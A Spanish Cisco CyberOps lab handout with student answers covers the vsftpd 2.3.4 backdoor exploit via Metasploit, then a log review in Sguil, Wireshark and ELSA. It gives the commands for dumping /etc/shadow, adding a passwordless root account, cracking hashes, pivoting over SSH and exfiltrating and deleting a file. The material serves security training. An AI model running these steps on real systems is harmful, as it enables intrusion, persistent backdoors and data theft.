12.4.1.2 Lab - Isolate Compromised Host Using 5-Tuple

Práctica de laboratorio: Host comprometido aislado utilizando el
método de 5 componentes (5-Tuple)

Topología
Objetivos
En esta práctica de laboratorio revisarán archivos de registro durante el ataque a una vulnerabilidad
documentada para determinar los hosts y el archivo comprometidos.
Parte 1: Preparar el entorno virtual
Parte 2: Reconocimiento
Parte 3: Ataque
Parte 4: Infiltración
Parte 5: Revisar los archivos de registro
 Cisco y/o sus filiales. Todos los derechos reservados. Información confidencial de Cisco Página 1 de 19 www.netacad.com
Práctica de laboratorio: Host comprometido aislado utilizando el método de 5 componentes (5-Tuple)
Antecedentes / Escenario
Los administradores de TI utilizan 5-Tuple cuando necesitan identificar los requisitos necesarios para crear
un entorno de red operativo y seguro. Los componentes de 5-Tuple son los siguientes: la dirección IP y el
número de puerto de origen, la dirección IP y el número de puerto de destino y el protocolo en uso.
En esta práctica de laboratorio atacarán un servidor vulnerable con ataques conocidos. También revisarán
los archivos de registro para determinar los hosts y el archivo afectados.
Recursos necesarios
 Servidor con al menos 8 GB de RAM y 35 GB de espacio libre en disco.
 Versión más reciente de Oracle VirtualBox
 Conexión a Internet
 Cuatro máquinas virtuales:
Máquina virtual RAM Espacio en disco Usuario Contraseña
VM CyberOps Workstation 1GB 7GB analyst cyberops

Kali 1GB 10GB Raíz cyberops
Metasploitable 512KB 8GB msfadmin msfadmin
Security Onion 3 GB 10GB analyst cyberops
Parte 1: Preparar el entorno virtual

a. Abran Oracle VirtualBox.
b. En la ventana de CyberOps Workstation, verifiquen que la red esté definida en Internal Network (Red
interna). Seleccionen Machine > Settings > Network (Máquina > Configuración > Red). En Attached To
(Conectada a), seleccionen Internal Network. En el menú desplegable junto a Nombre, seleccione
interna; luego, haga clic en Aceptar.
c. Abran las máquinas virtuales CyberOps Workstation, Kali, Metasploitable y Security Onion e inicien
sesión en ellas.
d. En la VM CyberOps Workstation VM, abran un terminal y configuren la red; para ello, ejecuten el script
configure_as_static.sh.
Como el script requiere privilegios de usuario avanzado, introduzcan la contraseña correspondiente al
usuario analyst.
[analyst@secOps~]$ sudo ./lab.support.files/scripts/configure_as_static.sh
[sudo] contraseña para analyst:
Configurar la NIC de la siguiente manera:
IP: 192.168.0.11/24
GW: 192.168.0.1
Configuración de IP exitosa.
[analyst@secOps ~]$
e. En la VM Security Onion, hagan clic derecho en el Escritorio > Open Terminal Here (Abrir terminal
aquí). Introduzca el comando sudo service nsm status para verificar que todos los servidores y
sensores estén listos. Este proceso podría demorar unos instantes. Si algunos servicios reportan una
falla (FAIL), repitan el comando según sea necesario hasta que todos los estados sean OK antes de
pasar a la parte siguiente.
analyst@SecOnion:~/Desktop$ sudo service nsm status
Status: securityonion
* sguil server [ OK ]
Status: HIDS
* ossec_agent (sguil) [ OK ]
Status: Bro
Name Type Host Status Pid Started
manager manager localhost running 5577 26 Jun 10:04:27
proxy proxy localhost running 5772 26 Jun 10:04:29
seconion-eth0-1 worker localhost running 6245 26 Jun 10:04:33
Status: seconion-eth0
* netsniff-ng (full packet data) [ OK ]
* pcap_agent (sguil) [ OK ]
* snort_agent-1 (sguil) [ OK ]
* snort-1 (alert data) [ OK ]
* barnyard2-1 (spooler, unified2 format) [ OK ]
<output omitted>
Parte 2: Reconocimiento
En esta parte utilizarán nmap para determinar si la VM Metasploitable tiene alguna vulnerabilidad asociada
con vsftpd versión 2.3.4.
a. En la VM Security Onion, introduzcan date para mostrar la fecha y hora.
analyst@SecOnion:~/Desktop$ date
Registren su fecha y hora.
Sat feb 22 13:29:20 utc 20 20 _________________________________________________
b. En la VM Kali, hagan clic derecho en el escritorio y seleccionen Open Terminal (Abrir terminal).
c. Con las opciones de nmap, utilizarán un script para probar si hay alguna vulnerabilidad FTP en la VM
Metasploitable VM en 209.165.200.235. Introduzcan el siguiente comando:
root@kali:~# nmap --script ftp-vsftpd-backdoor 209.165.200.235 –-reason >
ftpd.txt
Los resultados se redireccionan y se guardan en el archivo de texto ftpd.txt. Este proceso demorará
unos instantes.
d. Cuando retorne el cursor, abran el archivo de texto que contiene los resultados de nmap.
root@kali:~# cat ftpd.txt
En el resultado se ve la vulnerabilidad vsftpd y otros puertos abiertos que son detectados por nmap en
la VM Metasploitable. En esta práctica de laboratorio atacarán la vulnerabilidad con el puerto 21.
Starting Nmap 7.40 ( https://nmap.org ) at 11/07/2017 11:34 EDT
Nmap scan report for 209.165.200.235
Host is up, received echo-reply ttl 63 (0.0011s latency).
Not shown: 977 closed ports
Reason: 977 resets
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| Id: OSVDB:73573 CVE:CVE-2011-2523

|vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|Disclosure date: 2011-07-03
|Exploit results:
|Shell command: id
|Results: uid=0(root) gid=0(root)
|References:
|http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|http://osvdb.org/73573
<output omitted>
Parte 3: Explotación
Ahora que han determinado que pudieron obtener acceso raíz a la VM Metasploitable, atacarán la
vulnerabilidad vsftp para obtener el control total de la VM Metasploitable. Afectarán al archivo /etc/shadow
para poder obtener acceso a los otros hosts de la red.
Paso 1: Configurar el ataque

En este paso utilizarán Metasploit Framework para iniciar el ataque contra la VM Metasploitable por medio de
vsftpd. Metasploit Framework es una herramienta diseñada para desarrollar e iniciar ataques contra un host
objetivo remoto. También se puede utilizar para probar la vulnerabilidad de un host.
a. En un terminal de la VM Kali, introduzca msfconsole en el indicador para iniciar el marco Metasploit.
Esto demorará unos instantes.
root@kali:~# msfconsole
b. En el indicador msf, escriba search vsftpd para buscar el módulo asociado con la puerta trasera
VSFTPD v2.3.4. Utilizarán este módulo para el ataque. Esta búsqueda demorará unos instantes mientras
se genera la base de datos por primera vez.
msf > search vsftpd
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description

---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4
Backdoor Command Execution
c. Se encontró el ataque. Introduzcan el siguiente comando en el cursor para utilizar el ataque de puerta
trasera vsftp.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
d. En el cursor del ataque, definan el host objetivo como la VM Metasploitable.
msf exploit(vsftpd_234_backdoor) > set rhost 209.165.200.235
rhost => 209.165.200.235
e. Verifiquen la configuración del ataque. Introduzcan show options en el cursor.
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 209.165.200.235 yes The target address
RPORT 21 yes The target port (TCP)
Exploit target:
Nombre de ID
-- ----
0 Automatic
Paso 2: Ejecutar el ataque

Ahora utilizarán el ataque vsftpd para obtener acceso raíz a la VM Metaspoitable.
a. Introduzcan el comando exploit en el indicador para ejecutar el ataque.
msf exploit(vsftpd_234_backdoor) > exploit
[*] 209.165.200.235:21 - Banner: 220 (vsFTPd 2.3.4)

[*] 209.165.200.235:21 - USER: 331 Please specify the password.
[+] 209.165.200.235:21 - Backdoor service has been spawned, handling...
[+] 209.165.200.235:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (209.165.201.17:33985 ->
209.165.200.235:6200) at 2017-07-11 11:53:35 -0400
<No se muestra ningún indicador del sistema>
b. Con esto se ingresa al terminal de Metasploit Framework y ahora podrán tener acceso raíz a la VM
Metasploitable desde el host Kali. Observen que no se muestra ningún cursor del sistema. Introduzcan
whoami para verificar que tienen acceso raíz a la VM Metasploitable.
whoami
¿Cuál es el nombre de usuario actual? root__________________________________
c. Introduzcan hostname para verificar el nombre del host.
hostname
¿Cuál es el nombre del host? metasploitable _______________________________________
d. La dirección IP de la VM Metasploit es 209.165.200.235. Introduzcan ifconfig para verificar la dirección
IP en el host actual.
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:15:91:86
inet addr:209.165.200.235 Bcast:209.165.200.255 Mask:255.255.255.224
inet6 addr: fe80::a00:27ff:fe15:9186/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:78058 errors:2 dropped:0 overruns:0 frame:0
TX packets:195672 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:11803523 (11.2 MB) TX bytes:91415071 (87.1 MB)
Interrupt:10 Base address:0xd020
lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX bytes:450261 (439.7 KB) TX bytes:450261 (439.7 KB)
e. Para obtener el control total de la VM Metasploitable, lo primero que tiene que hacer es mostrar el
contenido del archivo /etc/shadow. En el archivo /etc/shadow se guarda la información de la contraseña
en un formato cifrado para las cuentas del sistema, junto con información opcional sobre la antigüedad.
Introduzca el comando cat /etc/shadow para mostrar el contenido.
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
<some output omitted>
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
analyst:$1$uvEqE7eT$x6gczc318aD6mhxOFZqXE.:17338:0:99999:7:::
f. Resalten el contenido de /etc/shadow, hagan clic derecho sobre el contenido resaltado y seleccionen
Copy (Copiar).
g. Abran un terminal nuevo en la VM Kali e inicien el editor de texto nano. Escriba nano /root/shadow.txt
en el indicador.
root@kali:~# nano /root/shadow.txt
h. Hagan clic derecho sobre el espacio en blanco en nano y seleccionen Paste (Pegar). Después de haber
pegado el contenido, quite todas las líneas en blanco de la parte inferior, si es necesario. Presione Ctl-X
para guardar y salir de nano. Presionen y cuando el sistema les pida guardar el archivo y aceptar el
nombre de archivo shadow.txt.
Este archivo /root/shadow.txt guardado se utilizará en un paso siguiente con John the Ripper para
decodificar las contraseñas de los nombres de inicio de sesión y así poder acceder al sistema en forma
remota a través de SSH.
i. En el mismo terminal, introduzcan el comando cat y grep para mostrar solo los detalles correspondientes
al usuario root.
root@kali@~# cat /root/shadow.txt | grep root
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
Observen que el signo de dos puntos (:) separa cada línea en 9 campos. Si utilizamos la cuenta del
usuario raíz como ejemplo, root es el nombre de inicio de sesión y
$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. es la contraseña cifrada. En los siguientes 6 campos se definen
las configuraciones correspondientes a la contraseña, como la fecha del último cambio, la antigüedad
mínima y máxima de la contraseña y su fecha de vencimiento. El último campo se reserva para uso
futuro.
Para obtener más información sobre el archivo /etc/shadow, escriba man shadow en un indicador del
terminal.
j. Regresen al terminal de Metasploit Framework en la VM Kali. Agregarán un usuario nuevo myroot a la
VM Metasploitable. Este usuario tendrá las mismas configuraciones de la contraseña que root.
Cuando estén creando el usuario nuevo utilizarán los mismos 9 campos que el usuario root; pero
eliminarán la contraseña cifrada asociada con el usuario root y dejarán vacío el campo de la contraseña.
Cuando el campo de la contraseña está vacío no se necesita ninguna contraseña para iniciar sesión
como el usuario myroot.
El comando echo anexará una línea nueva para agregar el usuario nuevo myroot al archivo
/etc/shadow.
Nota: Asegúrese de que haya dos signos de mayor (>); si no es así, sobrescribirá el archivo
/etc/shadow actual.
echo "myroot::14747:0:99999:7:::" >> /etc/shadow
k. Verifiquen que hayan agregado el usuario nuevo myroot a /etc/shadow.
cat /etc/shadow
<output omitted>
myroot::14747:0:99999:7:::
¿Por qué fue necesario copiar el contenido del archivo /etc/shadow a un archivo de texto nuevo en la
VM Kali?
Pista: ¿Qué sucedería si introdujera cat /etc/shadow > /root/shadow.txt en la consola de Metasploit
Framework?
Creariamos el archivo shadow.txt en la computadora
remota_______________________________________________________
l. Para permitir que myroot inicie sesión con privilegios elevados, agregará el usuario myroot con el
mismo número de Id. de usuario (UID), el mismo número de Id. de grupo (GID) del usuario, la misma
descripción del usuario, el mismo directorio de inicio del usuario y el mismo shell de inicio de sesión que
el usuario root al archivo /etc/passwd. El signo de dos puntos (:) separa los campos, y la x del segundo
campo representa la contraseña correspondiente al usuario. La contraseña cifrada se puede encontrar
en el archivo /etc/shadow correspondiente al mismo usuario.
Regresen a la ventana del terminal de la conexión remota de Metasploitable e introduzcan el comando
cat para ver la información correspondiente al usuario root.
cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash
m. Utilicen el siguiente comando echo para anexar la configuración correspondiente a myroot a
/etc/password.
Nota: Asegúrese de que haya dos signos de mayor (>); si no es así, sobrescribirán el archivo
/etc/shadow actual.
echo "myroot:x:0:0:root:/root:/bin/bash" >> /etc/passwd
Para obtener más información sobre el archivo /etc/passwd, escriban man 5 passwd en un cursor del
terminal.
n. Verifiquen que hayan agregado el usuario nuevo myroot a /etc/passwd.

cat /etc/passwd
<output omitted>
myroot:x:0:0:root:/root:/bin/bash
Con acceso raíz, el usuario myroot tiene el control completo de la VM Metasploitable.
o. Escriban exit cuando hayan terminado.
exit
[*] 209.165.200.235 - Command shell session 1 closed. Reason: Died from EOFError
msf exploit(vsftpd_234_backdoor) >

p. Presionen Intro y escriban quit para salir de la consola de Metasploit Framework.
Parte 4: Infiltración
Paso 1: Decodificar las contraseñas con John the Ripper

John the Ripper es una herramienta que se utiliza para averiguar las contraseñas débiles de los usuarios. En
este paso utilizarán John the Ripper para decodificar contraseñas débiles.
a. En el cursor raíz de la VM Kali, verifiquen que el archivo shadow esté en la carpeta /root de la VM Kali.
b. En el indicador raíz de la VM de Kali, introduzca el comando john para decodificar las contraseñas.
Utilicen la opción show para ver la confiabilidad de las contraseñas decodificadas.
Nota: Se agregó la contraseña cyberops al archivo /usr/share/john/password.lst para acelerar el
proceso de decodificación de las contraseñas.
root@kali:~# john --show /root/shadow.txt
analyst:cyberops:17338:0:99999:7:::
1 password hash cracked, 7 left

Después de haber decodificado la contraseña correspondiente al usuario analyst, podrán acceder a
Metasploitable a través de SSH con analyst como nombre de inicio de sesión.
Paso 2: Encontrar el host objetivo

En este paso utilizarán diferentes comandos para encontrar la dirección IP de un posible host en la red
interna detrás de la DMZ.
a. Establezcan una sesión de SSH a la VM Metasploitable. Escriba sí para aceptar la firma digital de RSA
cuando se conecte por primera vez. La conexión puede demorar unos instantes. Introduzcan cyberops
como la contraseña cuando se los solicite el sistema.
root@kali:~# ssh [email protected]
[email protected]'s password:
b. Verifiquen que tienen acceso raíz a Metasploitable. Escriban su -l myroot en el cursor. La opción es la
letra minúscula L, no el número uno. Observen que el cursor pasó de analyst@metasploitable a
root@metasploitable.
analyst@metasploitable:~$ su -l myroot
root@metasploitable:~#
c. Muestren el archivo /etc/shadow.

root@metasploitable:~# cat /etc/shadow
d. Escriban exit en el cursor para regresar a los privilegios de acceso del usuario analyst.
e. Ahora muestren el archivo /etc/shadow como analyst.
analyst@metasploitable:~$ cat /etc/shadow
¿Por qué recibieron un mensaje de error? Registren el mensaje y explíquenlo.
Persmission denied, se recibió este error porque intenteamos acceder con un usuario que no tiene los
privilegios suficientes para modificar o ver los archivos de contraseña
____________________________________________________________________________________
f. Escriban ifconfig para generar una lista de todas las interfaces de red presentes en Metasploitable.
analyst@metasploitable:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:ab:84:07
inet6 addr: fe80::a00:27ff:feab:8407/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX bytes:117030 (114.2 KB) TX bytes:123570 (120.6 KB)
Interrupt:10 Base address:0xd020
<output omitted>
g. Escriban ip route para determinar el gateway predeterminado correspondiente a esta red.

analyst@metasploitable:~$ ip route
209.165.200.224/27 dev eth0 proto kernel scope link src 209.165.200.235
default via 209.165.200.226 dev eth0 metric 100
¿Cuál es el gateway predeterminado?

209.165.200.226______________________________________________________________________
______________
h. En la misma ventana del terminal, establezcan otra sesión de SSH a la VM Security Onion VM en
209.165.200.226 (interfaz eth1) como el usuario analyst. Escriban yes (sí) para aceptar la firma digital
de RSA cuando se conecten por primera vez. La conexión podría demorar unos instantes. Utilicen la
contraseña cyberops cuando se les solicite.
analyst@metasploitable:~$ ssh [email protected]
i. Escriban ifconfig para ver la lista de interfaces de red.
analyst@SecOnion:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:c3:cd:8c
inet6 addr: fe80::a00:27ff:fec3:cd8c/64 Scope:Link
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX bytes:656 (656.0 B) TX bytes:9377 (9.3 KB)
<output omitted>
j. Han determinado que la subred correspondiente a la red LAN es 192.168.0.0/24. Ahora utilizarán un
bucle for para determinar los hosts activos en la red LAN. Para ahorrar tiempo, solo harán ping a los
primeros 15 hosts.
analyst@SecOnion:~$ for ((i=1;i<15;i+=1)); do ping -c 2 192.168.0.$i; done
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=0.067 ms
--- 192.168.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.028/0.031/0.034/0.003 ms
<output omitted>
PING 192.168.0.11 (192.168.0.11) 56(84) bytes of data.
--- 192.168.0.11 ping statistics ---

2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.262/0.434/0.606/0.172 ms
<output omitted>
k. Solo 192.168.0.1 (eth0 de Security Onion) y 192.168.0.11 (VM CyberOps Workstation) están
respondiendo las solicitudes ping. Establezcan una sesión de SSH en la VM CyberOps Workstation.
Escriban yes (sí) para aceptar la firma digital de RSA cuando se conecten por primera vez. Introduzcan
cyberops como la contraseña.
analyst@SecOnion:~$ ssh 192.168.0.11
Paso 3: Exfiltrar un archivo confidencial

Ahora tienen acceso a la VM CyberOps Workstation a través de una serie de sesiones de SSH (VM Kali >
VM Security Onion > VM CyberOps Workstation) utilizando la contraseña que se decodificó en un paso
anterior. Ahora accederán a un archivo confidencial y exfiltrarán el contenido.
a. Verifiquen que están en el directorio de inicio de analyst. Pasen al directorio lab.support.files.
[analyst@secOps ~]$ cd lab.support.files
b. Generen una lista de los archivos del directorio. Verifiquen que el archivo confidential.txt esté en la
carpeta.
c. Establezcan una sesión de FTP para la máquina virtual de Metasploitable. Utilice el usuario
predeterminado analyst e introduzca cyberops como contraseña.
[analyst@secOps lab.support.files]$ ftp 209.165.200.235
Connected to 209.165.200.235.
220 (vsFTPd 2.3.4)
Name (209.165.200.235:analyst): analyst
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
d. Carguen el archivo confidential.txt a la VM Metasplolitable. Ahora tienen acceso al archivo y pueden
moverlo a la VM Kali para utilizarlo si así lo desean.
ftp> put confidential.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
103 bytes sent in 0.000104 seconds (41.6 kbytes/s)
e. Escriban quit cuando hayan terminado de transferir el archivo.
Paso 4: Cifrar los datos y quitar los originales

a. A menudo, los actores de amenazas cifran los datos confidenciales y los almacenan a nivel local,
posiblemente para exigir un rescate más adelante. Compriman el archivo confidential.txt con Zip y
cífrenlo. Introduzcan cyberops como la contraseña.
analyst@secOps lab.support.files]$ zip -e confidential.zip confidential.txt
Enter password:
Verify password:
adding: confidential.txt (deflated 4%)
b. Quiten el archivo confidential.txt de la VM CyberOps Workstation.
[analyst@secOps lab.support.files]$ rm confidential.txt
c. Escriban exit tres veces hasta regresar al cursor root@kali:~#.
d. Ahora el atacante puede copiar el archivo desde el FTP de la VM Metasploitable a la VM Kali. Esto
podría demorar unos instantes. Introduzcan la contraseña cyberops cuando el sistema se los solicite.
root@kali:~# scp [email protected]:/home/analyst/confidential.txt ~
confidential.txt 100% 102 102.1KB/s 00:00
Nota: Puede copiar el archivo directamente de la VM CyberOps Workstation a la VM Kali si hay alguna
cuenta que no sea la de raíz configurada en la VM Kali. Como FTP transmite el contenido en texto plano,
podrán verlo en los paquetes si utilizan Wireshark.
e. Si lo desean, pueden volver a iniciar sesión en Metasploitable y quitar el archivo confidential.txt del
servidor FTP.
root@kali:~# ssh [email protected]
analyst@metasploitable:~$ rm confidential.txt
f. En este momento pueden apagar las máquinas virtuales Metasploitable, CyberOps Workstation y Kali.
Parte 5: Revisar los archivos de registro

Después del ataque, el usuario analista ya no puede acceder al archivo de nombre confidential.txt. Ahora
revisarán los archivos de registro para determinar de qué manera se vio afectado el archivo.
Nota: Si esta red fuese de producción, sería aconsejable que los usuarios analyst y root cambien sus
contraseñas y cumplan con la política de seguridad vigente.
Paso 1: Revisar alertas en Sguil

a. Accedan a la VM Security Onion. Inicien sesión con el usuario analyst y la contraseña cyberops, si es
necesario.
b. Abran Sguil e inicien sesión. Hagan clic en Select All (Seleccionar todo) y, luego, en Start SGUIL
(Iniciar SGUIL).
c. Revisen los eventos que aparecen en la lista de la columna Event Message (Mensaje de eventos). Dos
de los mensajes son GPL ATTACK_RESPONSE id check returned root. Este mensaje indica que es
posible que se haya obtenido acceso raíz durante un ataque. El host de 209.165.200.235 devolvió el
acceso raíz a 209.165.201.17. Seleccionen las casillas de verificación Show Packet Data (Mostrar datos
del paquete) y Show Rule (Mostrar regla) para ver cada alerta más detalladamente.
d. Seleccionen el mensaje de raíz devuelto asociado con el Sensor seconion-eth1-1 para profundizar el
análisis. En la figura de abajo, se utiliza el ID de alerta 5.2568 y sus eventos correlacionados. Sin
embargo, es muy probable que sus ID de alerta sean otro número.
e. Hagan clic en el número que se encuentra debajo del encabezado CNT para seleccionar View
Correlated Events (Ver eventos correlacionados).
f. En la ficha nueva, haga clic derecho sobre el ID de alerta correspondiente a una de las alertas GPL
ATTACK_RESPONSE id check returned root y seleccione Transcripción. En este ejemplo se utiliza el
ID de alerta 5.2570.
g. Revisen las transcripciones correspondientes a todas las alertas. En la última alerta de la ficha
probablemente se mostrarán las transacciones entre Kali (actor de la amenaza) y Metasploitable
(objetivo) durante el ataque.
¿Qué sucedió durante el ataque?

Se ha obtenido acceso al servidor como root y luego se han ejecutado una serie de comandos,primero
se averiguo si el su¡usuario era root, luego la dirección IP, luego se agregó un usuario “myroot”con
privilegios de root y de igual manera con la carpeta de password
Paso 2: Pasar a Wireshark

a. Seleccionen la alarma que les proporcionó la transcripción en el paso anterior. Hagan clic derecho sobre
el ID de la alerta y seleccionen Wireshark. En la ventana principal de Wireshark se muestran 3 vistas de
un paquete.
b. Para ver todos los paquetes ensamblados en una conversación de TCP, hagan clic derecho sobre
cualquier paquete y seleccionen Follow TCP Stream (Seguir flujo de TCP).
¿Qué observaron? ¿Qué indican los colores de texto rojo y azul?

Rojo las acciones del atacante y azul la respuesta del
servidor_____________________________________________________________________________
_______
____________________________________________________________________________________
c. Salgan de la ventana del flujo de TCP. Cierren Wireshark cuando hayan terminado de revisar la
información provista por Wireshark.
Paso 3: Utilizar ELSA para pasar a los archivos de registro de Bro

a. Regresen a Sguil. Haga clic derecho sobre la IP de origen o de destino correspondiente a la misma
alerta GPL ATTACK_RESPONSE id check returned root y seleccione Búsqueda de IP con ELSA >
DstIP. Introduzcan analyst como nombre de usuario y cyberops como contraseña cuando ELSA se los
solicite.
Nota: Si ve el mensaje "Su conexión no es privada", haga clic en AVANZADAS > Proseguir al host
local (inseguro) para continuar.
b. Hagan clic en bro_notice.
c. El resultado indica que 209.165.201.17 estaba realizando un escaneo de puertos en 209.165.200.235, la

VM Metasploitable. El atacante probablemente encontró vulnerabilidades en la VM Metasploitable para
obtener acceso.
d. Si un atacante se ha apoderado de Metasploitable, querrán determinar cuál fue el ataque que utilizó y a
qué pudo acceder el atacante.
Paso 4: Regresar a Sguil para investigar el ataque

a. Diríjanse a Sguil y hagan clic en la ficha RealTime Events (Eventos en tiempo real). Localicen los eventos
ET EXLOIT VSFTPD Backdoor User Login Smiley. Estos eventos son posibles ataques y tuvieron lugar
dentro del período de acceso raíz no autorizado. En este ejemplo se utiliza el ID de alerta 5.2567.
b. Hagan clic derecho sobre el número que se encuentra debajo del encabezado de CNT y seleccionen
View Correlated Events (Ver eventos correlacionados) para ver todos los eventos relacionados.
Seleccionen el ID de alerta que comienza con 5. Esta alerta recopiló la información proveniente del
sensor en la interfaz seconion-eth1-1.
c. En la ficha nueva con todos los eventos correlacionados, hagan clic derecho sobre el ID de alerta y
seleccione Transcript (Transcripción) para ver cada alerta más detalladamente. En este ejemplo se
utiliza el ID de alerta 5.2569. En la última alerta probablemente se mostrará la transmisión de TCP entre
el atacante y la víctima.
d. También pueden hacer clic derecho sobre el ID de alerta y seleccionar Wireshark para revisar y guardar
el archivo pcap y el flujo de TCP.
Paso 5: Utilizar ELSA para ver datos exfiltrados

a. Si quieren utilizar ELSA para obtener más información sobre la misma alerta de arriba, hagan clic
derecho sobre la dirección IP de origen o sobre la de destino y seleccionen ELSA IP Lookup > DstIP.
b. Hagan clic en bro_ftp para ver los archivos de registro de ELSA relacionados con FTP.
c. ¿Qué archivo se transfirió por FTP a 209.165.200.235? ¿Quién es el dueño de la cuenta que se utilizó
para transferir el archivo?
Confidential.txt________________________________________________________________________
___________
d. Hagan clic en info para ver las transacciones en el último registro. El campo reply_msg indica que esta
es la última entrada correspondiente a la transferencia del archivo confidential.txt. Hagan clic en Plugin >
getPcap (Complemento > getPcap). Introduzcan el nombre de usuario analyst y la contraseña
cyberops cuando el sistema se los solicite. Si es necesario, hagan clic en Submit (Enviar). CapMe es
una interfaz web que les permite obtener una transcripción pcap y descargar el pcap.
La transcripción de pcap se traduce utilizando tcpflow, y esta página también proporciona el enlace para
acceder al archivo pcap.
e. Para determinar el contenido del archivo afectado, hagan doble clic en el icono del escritorio para abrir
ELSA y así abrir una ficha nueva y realizar otra búsqueda.
f. Expandan FTP y hagan clic en FTP Data (Datos de FTP). Hagan clic en uno de los enlaces de Información y
seleccionen getPcap en el menú desplegable para determinar el contenido del archivo robado.
g. En el resultado se ve el contenido del archivo de nombre confidential.txt que se transfirió al servidor FTP.
Paso 6: Limpieza
Cierren todas las VM cuando hayan terminado.
Reflexión
En esta práctica de laboratorio han utilizado una vulnerabilidad para obtener acceso a información no
autorizada y han revisado los archivos de registro como analistas especializados en ciberseguridad. Ahora
resuman lo que aprendieron.
Se usaron vulnerabilidades del sistema remoto no solucionadas para accer y tomar control de este a través
de asignación de roles root , luego establcido el m`todo de ingreso, se transfirió información usando ftp a
través de dos servidores. Luego se utilizaon herramientas para trazar el método de ataque y el impacto del
mismo

12.4.1.2 Lab - Isolate Compromised Host Using 5-Tuple

Cargado por

Copyright:

Formatos disponibles

12.4.1.2 Lab - Isolate Compromised Host Using 5-Tuple

Cargado por

Información del documento

Título original

Derechos de autor

Formatos disponibles

Compartir este documento

Compartir o incrustar documentos

Opciones para compartir

¿Le pareció útil este documento?

¿Este contenido es inapropiado?

Copyright:

Formatos disponibles

12.4.1.2 Lab - Isolate Compromised Host Using 5-Tuple

Cargado por

Copyright:

Formatos disponibles

Práctica de laboratorio: Host comprometido aislado utilizando el

método de 5 componentes (5-Tuple)

Máquina virtual RAM Espacio en disco Usuario Contraseña

VM CyberOps Workstation 1GB 7GB analyst cyberops

Parte 1: Preparar el entorno virtual

| Id: OSVDB:73573 CVE:CVE-2011-2523

Paso 1: Configurar el ataque

Name Disclosure Date Rank Description

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Paso 2: Ejecutar el ataque

[*] 209.165.200.235:21 - Banner: 220 (vsFTPd 2.3.4)

lo Link encap:Local Loopback

n. Verifiquen que hayan agregado el usuario nuevo myroot a /etc/passwd.

msf exploit(vsftpd_234_backdoor) >

Paso 1: Decodificar las contraseñas con John the Ripper

1 password hash cracked, 7 left

Paso 2: Encontrar el host objetivo

c. Muestren el archivo /etc/shadow.

g. Escriban ip route para determinar el gateway predeterminado correspondiente a esta red.

¿Cuál es el gateway predeterminado?

--- 192.168.0.11 ping statistics ---

Paso 3: Exfiltrar un archivo confidencial

Paso 4: Cifrar los datos y quitar los originales

Parte 5: Revisar los archivos de registro

Paso 1: Revisar alertas en Sguil

¿Qué sucedió durante el ataque?

Paso 2: Pasar a Wireshark

¿Qué observaron? ¿Qué indican los colores de texto rojo y azul?

Paso 3: Utilizar ELSA para pasar a los archivos de registro de Bro

b. Hagan clic en bro_notice.

c. El resultado indica que 209.165.201.17 estaba realizando un escaneo de puertos en 209.165.200.235, la

Paso 4: Regresar a Sguil para investigar el ataque

Paso 5: Utilizar ELSA para ver datos exfiltrados

También podría gustarte